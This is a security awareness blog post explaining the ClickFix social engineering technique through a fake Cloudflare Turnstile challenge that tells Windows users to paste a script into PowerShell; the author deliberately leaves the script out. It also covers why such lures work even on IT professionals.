ClickFix Cloudflare Impersonation Attack

ClickFix Introduction

Before diving into the core topic of this post, let’s first define the ClickFix technique and explore its potential impact on a compromised machine.

ClickFix is a social engineering technique designed to trick a user into fixing a problem that doesn’t actually exist. It typically achieves this through a deceptive pop-up that draws the user’s attention toward an imaginary issue.

Imagine this scenario: a pop-up reads, “Perform the below instructions on your PC to download this movie,” appearing right as you attempt to download a pirated 4K copy of your favorite film. Add the fact that you’ve spent hours hunting for a high-quality release without success. You finally land on a site featuring crisp screenshots, and the only thing standing between you and the movie is a tiny pop-up outlining three simple steps.

You would be surprised by how many people fall into this trap, even fairly knowledgeable IT professionals.

Disclaimer: We at coderevere strongly discourage any form of piracy. The above text and example are used strictly for demonstration purposes. Most piracy attempts lead directly to malicious software and social engineering traps anyway.

So, what exactly is social engineering we keep mentioning?

Social engineering is a psychological manipulation technique used to influence people into performing a specific set of actions that are ultimately detrimental to them. It can serve various malicious purposes, including stealing sensitive information, gaining unauthorized access, or committing fraud. I intend to cover this subject in much more detail in a separate blog post.

Cloudflare Challenge

Cloudflare, as most of you are likely aware, is a cybersecurity giant that offers a popular, free alternative to traditional CAPTCHAs. This challenge pops up in the browser when Cloudflare suspects bot or unusual activity originating from an end-user’s device or IP address. Cloudflare’s version of this challenge is called “Turnstile.”

Turnstile is designed to make it exceptionally easy for humans to verify themselves, unlike traditional puzzle-based CAPTCHAs that can be difficult, require multiple attempts, and often leave users frustrated. Turnstile features a simple checkbox that is seamless for human users but significantly harder for automated bots to bypass behind the scenes.

Cloudflare Turnstile Usage

Based on data from BuiltWith and Wappalyzer, Cloudflare Turnstile is currently live on approximately half a million websites. That provides Cloudflare with an immense dataset to train its bot-detection capabilities. What remains up for debate is the quality of the data Cloudflare gathers here; because it is a free tool, many smaller websites using Turnstile might not have sufficient traffic and may not attract sophisticated bot operators that larger targets do. Nevertheless, it is a fact that many top-tier websites leverage Turnstile, and it ranks highly in the CAPTCHA alternative space.

ClickFix Attack: Cloudflare Impersonation

A Reddit user recently highlighted a new technique in this space where users are presented with what appears to be an innocent Cloudflare challenge pop-up. However, it is entirely illegitimate. It is a spoof designed to impersonate Cloudflare’s styling elements, tricking users into following its instructions, the effects of which can be devastating.

The fake page instructs Windows users to:

• Open Powershell (Win + X)
• Paste a malicious script
• Hit Enter

This is highly likely to be self-executing malware. Upon executing its secondary payload, it may reveal itself as an Information Stealer, Ransomware, or a Remote Access Trojan (RAT). While the exact payload in this specific instance may not have been safely detonated and identified yet, the intent is clearly malicious. I am intentionally omitting the actual script here for safety reasons. If you are interested, you can find the technical discussion on Reddit.

Please note that PowerShell is incredibly powerful. When run with administrator privileges, it can easily be used to disable or override antivirus programs, making these types of social engineering attacks extremely dangerous.

Snapshot:

Impact

Naturally, there is debate on Reddit regarding the efficacy of such attacks, as they seem quite “in your face.” Many users are astonished that someone could be tricked by a tactic as simple as copying and pasting a script.

However, data consistently shows that many people do fall prey to these attempts. While non-IT folks are generally easier targets, IT professionals are frequently compromised as well. There are several ClickFix campaigns that specifically pretend to solve a system error. Because many IT professionals have a natural inclination to troubleshoot and fix system issues, their own curiosity can be weaponized against them. In fact, many seasoned IT professionals have admitted to being duped by highly targeted phishing attempts just like this one.